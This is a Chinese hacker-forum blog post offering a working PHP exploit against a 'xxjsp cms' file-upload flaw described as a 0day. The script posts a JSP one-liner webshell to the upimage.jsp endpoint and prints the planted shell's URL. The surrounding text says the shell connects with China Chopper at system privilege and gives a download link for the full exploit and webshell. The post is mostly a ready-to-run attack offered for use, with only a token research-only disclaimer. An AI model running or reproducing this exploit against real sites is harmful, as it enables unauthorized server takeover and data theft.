今天起了个早 看到 法客的 有个贱人 (id还真的叫贱人 ) 发了个 0day 有点时间 就写了个 exp

先上 jb

附件里面的 1.txt 是 jsp 一句话
菜刀连接 chopper jsp就是好 直接是系统权限

这里需要在命令行下使用 curl 开启 curl 方法

1.打开php.ini,开启extension=php_curl.dll
2.检查php.ini的extension_dir值是哪个目录,检查有无php_curl.dll,没有的请下载php_curl.dll,再把php目录中的libeay32.dll,ssleay32.dll拷到c:\windows\system32里面

exp (注 : 仅供技术研究)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<!--?php 

set_time_limit(0);

echo "
=======================================================================================
┏━━━━━━━┓ F CK | 法客论坛 - F4ck Team
┏┫    |||┣┓   ┏┓ | 关于法客 - http://team.f4ck.net
┗┫━━ ┃ ━━┣┛   ┣┫ | 联系法客 - http://team.f4ck.net/call.html
┃ ━━━━━ ┃  ┏┳┫┣┳┓ | 核心成员 - http://team.f4ck.net/team.html
┗━━━┳━━━┛  ┃    ┃ | 荣誉会员 - http://team.f4ck.net/honor.html
┏━━▇▇▇━━━━━┻━━━━┛ | 邀 请 码 - http://team.f4ck.net/reg.html
┃  ▇▇▇ | ExpTitle - xxjsp cms GetShell
┃  ▇▇▇ | Author - Yaseng
┗  ┃U┃ | SbBlog - http://www.yaseng.me
┃ ┃ |
=======================================================================================
";

if ($argc < 2) { print_r(' +---------------------------------------------------------------------------+ Example: php '.$argv[0].' localhost +---------------------------------------------------------------------------+ '); exit; } $site = $argv[1]; $url=$site.'/system/resource/smalledit/upimage.jsp?actiontype=uploadprepic&amp;dbName=vsb&amp;ownerName=&amp;owner='; $file = array("wbimageurlf"=> '@'.dirname(__FILE__)."\\1.txt","wbimageurl"=>"1.jsp");//文件路径,前面要加@,表明是文件上传.

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER,0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$file); //提交 文件
$contents = curl_exec($ch);

curl_close($ch);

if(preg_match_all("/window.returnValue = \'(.*)';/sU",$contents,$result)){

$shell = $result[1][0];

$shell=str_replace("\\","",$shell);

echo "[*]--Good Get Shell:".$site.$shell."\r\n";

}
else
{

echo "[-]--Bad No Shell:".$site."\r\n";

}

?>

文中 jsp一句话 及 完整exp 下载 猛点击我